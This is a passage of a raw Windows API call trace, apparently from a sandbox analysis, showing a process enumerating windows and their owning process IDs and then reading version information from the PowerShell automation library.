returned 0x0 [0142.679] EnumWindows (lpEnumFunc=0x28d3612, lParam=0x0) returned 1 [0142.681] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6d4 [0142.681] GetLastError () returned 0x0 [0142.681] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x32c [0142.681] GetLastError () returned 0x0 [0142.681] GetWindowThreadProcessId (in: hWnd=0x200cc, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.681] GetLastError () returned 0x0 [0142.682] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.682] GetLastError () returned 0x0 [0142.682] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.682] GetLastError () returned 0x0 [0142.682] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.682] GetLastError () returned 0x0 [0142.682] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.682] GetLastError () returned 0x0 [0142.682] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.682] GetLastError () returned 0x0 [0142.682] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.682] GetLastError () returned 0x0 [0142.682] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.682] GetLastError () returned 0x0 [0142.683] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.683] GetLastError () returned 0x0 [0142.683] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.683] GetLastError () returned 0x0 [0142.683] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.683] GetLastError () returned 0x0 [0142.683] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.683] GetLastError () returned 0x0 [0142.683] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x3a0 [0142.683] GetLastError () returned 0x0 [0142.683] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.683] GetLastError () returned 0x0 [0142.684] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.684] GetLastError () returned 0x0 [0142.684] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.684] GetLastError () returned 0x0 [0142.684] GetWindowThreadProcessId (in: hWnd=0x201e0, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x97c [0142.684] GetLastError () returned 0x0 [0142.684] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x90c [0142.684] GetLastError () returned 0x0 [0142.684] GetWindowThreadProcessId (in: hWnd=0x1301a0, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x890 [0142.684] GetLastError () returned 0x0 [0142.684] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.684] GetLastError () returned 0x0 [0142.684] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.684] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.685] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.685] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.685] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.685] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.685] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.685] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.685] GetLastError () returned 0x0 [0142.685] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.686] GetLastError () returned 0x0 [0142.686] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.686] GetLastError () returned 0x0 [0142.686] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.686] GetLastError () returned 0x0 [0142.686] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.686] GetLastError () returned 0x0 [0142.686] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.686] GetLastError () returned 0x0 [0142.686] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.686] GetLastError () returned 0x0 [0142.686] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x900 [0142.686] GetLastError () returned 0x0 [0142.686] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.687] GetLastError () returned 0x0 [0142.687] GetWindowThreadProcessId (in: hWnd=0x5019a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.687] GetLastError () returned 0x0 [0142.687] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x530 [0142.687] GetLastError () returned 0x0 [0142.687] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x678 [0142.687] GetLastError () returned 0x0 [0142.687] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7e0 [0142.687] GetLastError () returned 0x0 [0142.687] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x4fc [0142.687] GetLastError () returned 0x0 [0142.687] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x28c [0142.687] GetLastError () returned 0x0 [0142.813] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x560 [0142.813] GetLastError () returned 0x0 [0142.813] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x2b0 [0142.813] GetLastError () returned 0x0 [0142.813] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x5c4 [0142.813] GetLastError () returned 0x0 [0142.813] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7c8 [0142.813] GetLastError () returned 0x0 [0142.814] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x214 [0142.814] GetLastError () returned 0x0 [0142.814] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x460 [0142.814] GetLastError () returned 0x0 [0142.814] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7f8 [0142.814] GetLastError () returned 0x0 [0142.814] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x90 [0142.814] GetLastError () returned 0x0 [0142.814] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x730 [0142.814] GetLastError () returned 0x0 [0142.814] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x228 [0142.814] GetLastError () returned 0x0 [0142.814] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x35c [0142.814] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7a0 [0142.815] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x670 [0142.815] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x60118, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x348 [0142.815] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6a4 [0142.815] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6d4 [0142.815] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6b0 [0142.815] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6d4 [0142.815] GetLastError () returned 0x0 [0142.815] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6b0 [0142.816] GetLastError () returned 0x0 [0142.816] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6d4 [0142.816] GetLastError () returned 0x0 [0142.816] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6a4 [0142.816] GetLastError () returned 0x0 [0142.816] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6a4 [0142.816] GetLastError () returned 0x0 [0142.816] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.816] GetLastError () returned 0x0 [0142.816] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.816] GetLastError () returned 0x0 [0142.816] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.816] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x200b4, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.817] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x200bc, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.817] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.817] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.817] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x54c [0142.817] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x43c [0142.817] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x5a4 [0142.817] GetLastError () returned 0x0 [0142.817] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x588 [0142.817] GetLastError () returned 0x0 [0142.818] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x3a0 [0142.818] GetLastError () returned 0x0 [0142.818] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x544 [0142.818] GetLastError () returned 0x0 [0142.818] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.818] GetLastError () returned 0x0 [0142.818] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x518 [0142.818] GetLastError () returned 0x0 [0142.818] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.818] GetLastError () returned 0x0 [0142.818] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x4f0 [0142.818] GetLastError () returned 0x0 [0142.818] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.818] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.819] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x66c [0142.819] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.819] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.819] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x3a0 [0142.819] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x3a0 [0142.819] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x124 [0142.819] GetLastError () returned 0x0 [0142.819] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x688 [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x3a0 [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x32c [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x428 [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x2024e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x9b4 [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x401de, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x90c [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x2019c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x808 [0142.820] GetLastError () returned 0x0 [0142.820] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x301a2, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x8c0 [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x530 [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x678 [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7e0 [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x4fc [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x28c [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x560 [0142.821] GetLastError () returned 0x0 [0142.821] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x2b0 [0142.821] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x5c4 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7c8 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x214 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x460 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7f8 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x90 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x730 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x228 [0142.822] GetLastError () returned 0x0 [0142.822] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x35c [0142.822] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x7a0 [0142.823] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x90154, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x670 [0142.823] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x3010e, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x348 [0142.823] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6b0 [0142.823] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6d4 [0142.823] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x6a4 [0142.823] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x54c [0142.823] GetLastError () returned 0x0 [0142.823] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x43c [0142.823] GetLastError () returned 0x0 [0142.824] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x5a4 [0142.824] GetLastError () returned 0x0 [0142.824] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x4f0 [0142.824] GetLastError () returned 0x0 [0142.824] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x66c [0142.824] GetLastError () returned 0x0 [0142.824] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x3a0 [0142.824] GetLastError () returned 0x0 [0142.824] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x3a0 [0142.824] GetLastError () returned 0x0 [0142.824] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x23e690 | out: lpdwProcessId=0x23e690) returned 0x688 [0142.824] GetLastError () returned 0x0 [0142.824] GetLastError () returned 0x0 [0142.825] WerSetFlags () returned 0x0 [0142.831] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0142.833] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x23ea6c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x23ea68 | out: pulNumLanguages=0x23ea6c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x23ea68) returned 1 [0142.833] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x23ea6c, pwszLanguagesBuffer=0x292d44c, pcchLanguagesBuffer=0x23ea68 | out: pulNumLanguages=0x23ea6c, pwszLanguagesBuffer=0x292d44c, pcchLanguagesBuffer=0x23ea68) returned 1 [0142.836] GetUserDefaultLocaleName (in: lpLocaleName=0x357e88, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0142.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.855] GetLastError () returned 0xcb [0142.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.858] GetLastError () returned 0xcb [0142.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.859] GetLastError () returned 0xcb [0142.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.879] GetLastError () returned 0xcb [0142.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.880] GetLastError () returned 0xcb [0142.880] SetErrorMode (uMode=0x1) returned 0x1 [0142.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x23e978 | out: lpFileInformation=0x23e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0142.880] GetLastError () returned 0xcb [0142.880] SetErrorMode (uMode=0x1) returned 0x1 [0142.880] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x23e9fc | out: lpdwHandle=0x23e9fc) returned 0x94c [0142.881] GetLastError () returned 0x0 [0142.881] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x292f97c | out: lpData=0x292f97c) returned 1 [0142.882] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x23e9c8, puLen=0x23e9c4 | out: lplpBuffer=0x23e9c8*=0x292fa18, puLen=0x23e9c4) returned 1 [0142.882] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292faf4, puLen=0x23e940) returned 1 [0142.882] lstrlenW (lpString="Microsoft Corporation") returned 21 [0142.882] lstrcpyW (in: lpString1=0x357e88, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0142.882] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fb48, puLen=0x23e940) returned 1 [0142.882] lstrlenW (lpString="System.Management.Automation") returned 28 [0142.882] lstrcpyW (in: lpString1=0x357e88, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0142.882] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fba4, puLen=0x23e940) returned 1 [0142.882] lstrlenW (lpString="6.1.7601.17514") returned 14 [0142.883] lstrcpyW (in: lpString1=0x357e88, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0142.883] VerQueryValueW (in: pBlock=0x292f97c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x23e944, puLen=0x23e940 | out: lplpBuffer=0x23e944*=0x292fbe4, 